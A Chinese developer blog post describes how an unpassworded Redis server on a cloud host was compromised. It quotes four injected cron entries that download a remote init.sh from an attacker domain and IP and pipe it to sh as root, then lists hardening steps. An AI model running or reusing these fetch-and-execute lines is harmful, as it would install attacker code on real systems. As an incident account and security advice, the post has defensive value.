记Redis 被攻击,数据被定时清除的问题

最新推荐文章于 2024-09-10 21:44:14 发布
最新推荐文章于 2024-09-10 21:44:14 发布
阅读量214 收藏
点赞数 1
文章标签: redis 数据库 缓存
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44957574/article/details/140736616
版权

问题描述

搞自己项目的时候,在云服务器上部署了redis,没有设密码,结果用了几天发现数据老是丢失,排查了过期时间以及内存大小都没有问题,然后注意到了几个陌生的backup1、buckup2、backup3、backup4数据:

backup1: */2 * * * * root cd1 -fsSL http://pyats.top/3nFTk7/init.sh | sh
backup2: */3 * * * * root wget -q -O- http://pyats.top/3nFTk7/init.sh | sh
backup3: */4 * * * * root curl -fsSL http://45.83.122.25/3nFTk7/init.sh | sh
backup4: */5 * * * * root wd1 -q -O- http://45.83.122.25/3nFTk7/init.sh | sh

刚开始以为是redis自带的东西,管理数据备份啥的,之后在网上查了查才发现,是被网络攻击了,看来网络攻击还是离我们很近的,要提高安全意识。

上面都是些定时任务,分别在2分钟、3分钟、4分钟、5分钟下载 init.sh 脚本并执行。

解决方法:

  1. 删除这些数据
  2. 为redis设置密码
  3. 重启redis服务

防御手段:

  1. 修改redis暴露的端口,添加用户名和密码认证
  2. 对访问源IP进行访问控制,可在防火墙限定指定源ip才可以连接Redis服务器
  3. 禁止Redis服务对公网开放,可通过修改redis.conf配置文件中的"#bind 127.0.0.1" ,可以设置成只对特定ip监听
时(^ω^)人‡
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Redis——Redis面试问题
庄小焱
05-08 848
本博文主要是分享有关于Redis的面试问题与解答。帮助大家更快的学习和了解Redis的相关知识点,同时更好的帮助大家应对面试中有关于Redis问题
Redis安全配置,以防数据库被入侵恶意清空数据丢失,且dump.rdb文件无法恢复
SuperNova
01-11 5223
最近比较衰,Redis数据库被好几次恶意攻击,导致里面的数据完全丢失。dump.rdb和appendonly.aof文件都不能恢复。一开始没有意识到数据库攻击,后来几个数据库连续这样,才发现有问题。被攻击redis里面多了一个crackit表,打开一看发现对方通过入侵自己的redis数据库,然后利用dump文件获得服务器的root权限,企图使用自己的数据库挖矿(minerd,俗称挖比特币)。最近
redis数据无效
m0_61580275的博客
10-24 2056
该文章是根据博主的真实情况写下来的 真实有效 ,要根据自己的真实情况去测试 去开发
python 解决 pyATS的crytography的问题
m0_60058625的博客
12-30 614
遇到crytop结果无法删除或更新cryptography 版本。解决过程,linux上。检查pyATS版本,并升级。
Redis储存的内容突然被擦除
u014157095的博客
03-02 1957
代码和日志文件中出现的报错信息: 经过排查发现各个项目都是redis(端口:4602)出现报错,报错信息一致:'MISCONF Redis is configured to save RDB snapshots, but it is currently not able to persist on disk. Commands that may modify the data set are disabled, because this instance is configured to report e
一次redis缓存被莫名删除
f_fanatic的博客
02-12 6400
用户反馈token总是很快失效,token是由redis保存的,有效期一小时,而且历史版本中没出现过类似的问题,所以花了点时间排查了一下。 首先,检查登录后token是否正常生成,根据对应的缓存key获取到生成的token,检查发现正常 然后,检查token什么时候消失,用ttl key的方式一直查询token的有效期,发现有效期是正常的一个小时,但是在很短时间内token就被删除了   ...
redis莫名数据被清问题排查
oMaFei的博客
10-18 3830
新版系统刚发布,前端反馈redis中的值经常被清空,第一反应怀疑谁的代码里面执行了flushall或者flushdb操作 通过redis的monitor追踪一波, redis-cli -a "xxx" monitor 如果redis没配置密码可以不用加-a参数,实际操作中我加了个 >> /data/log/trace_redis.log,把所有操作写到文件里面,注意时间长了...
Redis_常见问题
Chill Lyn
06-04 806
文章目录参考为什么使用RedisRedis与Memcached的区别,为什么选择RedisRedis为什么快?什么是上下文切换Redis的线程模型是什么?单线程的Redis是否浪费了多核服务器的性能?Redis有哪些数据结构和应用场景如果有大量的key在同一时间过期,需要注意什么?缓存穿透和击穿分别是什么,和缓存雪崩有什么区别,又该如何解决布隆过滤器原理是什么?Redis分布式锁是怎么回事?如何将存在固定前缀的key找出来?如果Redis正在线上提供服务,此时使用keys命令会有什么问题如何用Redis
redis杂谈
热门推荐
liushangzaibeijing的博客
12-05 4万+
本篇博客是redis相关使用和问题的汇总,有缓存穿透、缓存雪崩、redis的使用场景、分布式锁、队列、事务、lua脚本相关的java实现,希望能给读者学习redis提供帮助
redis导致java的cpu过高,redis 漏洞造成服务器被入侵-CPU飙升
weixin_39958631的博客
03-12 620
前言前几天在自己服务器上搭了redis,准备想着大展身手一番,昨天使用redis-cli命令的时候,10s后,显示进程已杀死。然后又试了几次,都是一样的结果,10s时间,进程被杀死。这个时候我还没发现事情的严重性。发现问题进程莫名被杀死,可能是cpu被占满,赶紧看了一下cpu。[root@vm_0_13_centos etc]# top果然如此,cpu被莫名的占满了。简单,根据pid杀死进程就行了...
测试面试之Redis
Dave0002的博客
07-19 708
测试面试之Redis
redis 内存不足 排查_redis莫名数据被清问题排查
weixin_39689622的博客
12-19 442
新版系统刚发布,前端反馈redis中的值经常被清空,第一反应怀疑谁的代码里面执行了flushall或者flushdb操作通过redis的monitor追踪一波,redis-cli -a "xxx" monitor 如果redis没配置密码可以不用加-a参数,实际操作中我加了个 >> /data/log/trace_redis.log,把所有操作写到文件里面,注意时间长了log会很...
redis所有键自动清空问题
a40980719hxy的博客
02-25 5050
redis中储存的所有键隔段时间全部清空,并莫名其妙多出几个键 解决办法:看样子是被恶意黑了,我的服务器自己搭建学习用,没开防火墙,redis的密码也特简单,查询redis的appendonly.aof日志发现有flushall,set等指令,基本确定是被人入侵了 正确解决办法 :redis安全问题,网上一搜有很多就不写了 我的解决办法:因为学习用,只改了两项:1.redis密码改了个复杂的,2...
Redis 运行一段时间后,数据清空的处理
intelrain的博客
04-23 3121
发生背景: 做稳定性测试时,运行一段时间的脚本后,环境中的redis就被清空 使用命令docker logs redisdocker 查看redis的log信息,报错如下 可能原因: 百度之后,说是redis的某个路径配置错误,需要重新配置。 解决步骤: 1、进入redis容器,查看redis.conf中的配置 cat /etc/redis.conf|grep dir 结果是 /var/lib/redis/data 2、安装redis的客户端redis_cli #从redi..
关于Redis数据清理
羽翼天宇
07-29 9536
关于Redis数据清理   我们数据平台中有使用Redis来给线上提供低延时(20毫秒以内)的高并发读写请求,其中最大的Redis使用了阿里云的Redis集群(256G),存储的录超过10亿,Key的有效期设置为15天,每天写入的录大概5000万左右,QPS大概在6万左右。由于过期Key的产生速度大于Redis自动清理的速度,因此在Redis中会有大量过期Key未被及时清理。 为什么有...
redis数据被无故删除_Redis为什么如此高效
weixin_39971172的博客
12-08 1912
个人公众号『码农札』,欢迎关注,查看更多精彩文章。Redis是什么,Redis为什么这么快?简介Redis是一款使用C语言编写、可基于内存亦可持久化的日志型、Key-Value型开源数据库。它可以用作:数据库缓存和消息中间件。数据结构String:缓存、计数器、分布式锁等。List:链表、队列、微博关注人时间轴列表等。Hash:用户信息、Hash 表等。Set:去重、赞、踩、共同好友等。Zse...
spring boot使用redis缓存数据自动清除
hello_junz的专栏
07-31 1万+
在spring boot项目中使用缓存很方便,有如下两种使用场景: 直接操作RedisTemplate缓存数据 在方法上加@Cacheable注解来缓存数据 方法1适用于缓存session、token等用户登录信息 方法2适用于缓存查询结果 直接操作RedisTemplate能够很灵活的对存入缓存中的key与value做定制化、并能很容易的实现缓存对象的过期时间。用@Cacheable注解...
Redis
最新发布
weixin_45939821的博客
09-10 243
〇、redis的几种数据类型 一、两种储存机制:RDB和AOF RDB: rdb是redis默认的存储机制; 触发规则后将内存数据存储到硬盘的dump.rdb文件中: save 900 1 save 300 10
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值